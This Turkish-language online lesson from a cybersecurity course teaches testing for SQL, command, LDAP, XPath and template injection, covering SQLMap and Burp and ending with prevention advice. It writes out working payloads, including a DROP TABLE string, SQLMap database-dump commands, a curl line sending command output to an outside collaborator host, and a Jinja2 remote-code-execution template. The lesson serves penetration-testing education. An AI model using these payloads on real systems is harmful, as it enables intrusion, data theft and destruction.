0Pricing
Cyber Security Academy · Ders

Enjeksiyon Güvenlik Açıklarını Sınama

SQL, komut ve LDAP enjeksiyonlarını sınamak için SQLMap, elle hazırlanmış yükler ve Burp kullanın.

Enjeksiyon Güvenlik Açıklarını Sınama, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 2. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

Enjeksiyon Güvenlik Açığı Sınıfları

Enjeksiyon, güvenilmeyen verilerin bir komutun veya sorgunun parçası olarak yorumlayıcıya gönderilmesiyle oluşur. Yorumlayıcı, verileri komutlardan ayıramaz ve saldırganın kontrolündeki mantığı çalıştırır. SQL, komut, LDAP, XPath ve şablon enjeksiyonlarının tümü bu sınıfa girer.

SQL Enjeksiyonunu Elle Sınama

SQL enjeksiyonunu araştırmak için basit yüklerle başlayın. Tek tırnak, savunmasız uygulamalarda SQL söz dizimi hatasına neden olur. Hata mesajlarını, yanıt uzunluğundaki farklılıkları ve yanıt süresini kontrol edin.

# Test for SQLi:
' -- basic quote
'' -- doubled quote
1' OR '1'='1 -- always-true
1; DROP TABLE users -- statement terminator

# In URL:
https://target.com/item?id=1'

Otomatik SQLi için SQLMap

SQLMap, SQL enjeksiyonunu algılamayı ve istismar etmeyi otomatikleştirir: enjeksiyon noktalarını algılar, DBMS'yi belirler ve savunmasız sistemlerde veritabanlarını dökebilir, dosyaları okuyabilir ve OS üzerinde kod çalıştırabilir.

# Basic scan
sqlmap -u 'http://target.com/item?id=1'

# With Burp request file
sqlmap -r request.txt

# Dump databases
sqlmap -u 'http://target.com/item?id=1' --dbs

# Dump a table
sqlmap -u '...' -D mydb -T users --dump

Komut Enjeksiyonunu Sınama

Komut enjeksiyonu, kullanıcı girdisinin OS kabuk işlevlerine aktarılmasıyla oluşur. Kabuk üstverileriyle sınama yapın: noktalı virgüller, dikey çubuklar, ters tırnaklar ve $() komut ikamesi.

# Test inputs (form fields, URLs, headers):
; id
| id
`id`
$(id)
&& id

# Blind (no output): use time delays
; sleep 5
| ping -c 5 127.0.0.1

# Or out-of-band:
; curl http://collaborator.example.com/$(id)

LDAP Enjeksiyonu

LDAP enjeksiyonu, kimlik doğrulama ve dizin aramalarında kullanılan LDAP sorgularını değiştirir. Süzgeçleri atlamak için kimlik doğrulama alanlarını şu değerle sınayın: *)(uid=*))(|(uid=*.

XPath Enjeksiyonu

XPath enjeksiyonu, XML tabanlı kimlik doğrulama sistemlerini hedefler. SQLi'ye benzer şekilde yükler XPath sorgularını değiştirir: kimlik doğrulamayı atlamak için ' or '1'='1.

Şablon Enjeksiyonu (SSTI)

Sunucu Taraflı Şablon Enjeksiyonu, kullanıcı girdisinin bir şablon motorunda (Jinja2, Twig, Freemarker) işlenmesiyle oluşur. Saptamak için {{7*7}} değerini enjekte edin; yanıt 49 gösteriyorsa SSTI vardır.

# Detection payloads:
{{7*7}}          # Jinja2, Twig
${7*7}           # Freemarker, EL
<%= 7*7 %>      # ERB (Ruby)

# RCE via Jinja2:
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Enjeksiyon Sınaması için Burp Kullanma

İstekleri Yineleyici'ye gönderin ve her parametreye elle yükler enjekte edin. Enjeksiyon kelime listeleriyle rastgele veriyle sınamayı otomatikleştirmek için saldırı aracını kullanın (SecLists mükemmel enjeksiyon yüklerine sahiptir).

# SecLists injection wordlists:
/usr/share/seclists/Fuzzing/SQLi/
/usr/share/seclists/Fuzzing/SSTI/
/usr/share/seclists/Fuzzing/command-injection*

Kör Enjeksiyonu Algılama

Görünür çıktı olmadığında şunları kullanın: çalıştırmayı doğrulamak için zaman gecikmeleri, bant dışı DNS geri çağrıları (Burp Collaborator veya interactsh) ve boole tabanlı yanıtlar (içerik uzunluğundaki değişiklikler).

Uygulama Hata Mesajlarını Okuma

Ayrıntılı hatalar veritabanı türünü, sorgu yapısını ve dosya yollarını açığa çıkarır; bu bilgiler kesin yükler hazırlamak için son derece değerlidir. Hata ayıklama veya hata açığa çıkaran girdilerle normal yüklerin yanı sıra her zaman sınama yapın.

Önleme Başvurusu

Enjeksiyon şu yöntemlerle önlenir: parametreli sorgular (SQLi), girdi doğrulama ve kabuk kaçışlama (komut enjeksiyonu) ve kullanıcı girdisini şablon olarak işlememek (SSTI). Geliştiriciler güvenli kod yazmak için bunları anlamalıdır.

Hızlı Kontrol

Yanıt 49 gösterdiğinde {{7*7}} SSTI algılama yükü neyi doğrular?

Özet: Enjeksiyon Sınaması

Enjeksiyon güvenlik açıkları, verilerin komutlarla karıştırılmasından kaynaklanır. Kullanıcı tarafından denetlenen her girdiyi SQL, komut, şablon ve LDAP enjeksiyonu yükleriyle sınayın. Otomatik SQL enjeksiyonu için SQLMap'i, elle sınama için Burp Yineleyicisi'ni, kör istismar içinse zaman gecikmesi ve OOB tekniklerini kullanın. Rapor için yükleri ve kanıtları her zaman belgeleyin.

Sıkça Sorulan Sorular

“Enjeksiyon Güvenlik Açıklarını Sınama” dersi ücretsiz mi?

Evet — “Enjeksiyon Güvenlik Açıklarını Sınama” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“Enjeksiyon Güvenlik Açıklarını Sınama” dersinde ne öğreneceğim?

SQL, komut ve LDAP enjeksiyonlarını sınamak için SQLMap, elle hazırlanmış yükler ve Burp kullanın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 2. dersidir.

“Enjeksiyon Güvenlik Açıklarını Sınama” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Burp Suite Proxy'si ve İstekleri Yakalama
  2. Enjeksiyon Güvenlik Açıklarını Sınama
  3. Kimlik Doğrulama ve Oturum Sınaması
  4. Dosya Yükleme ve SSRF Güvenlik Açıkları
← Cyber Security Academy Sayfasına Dön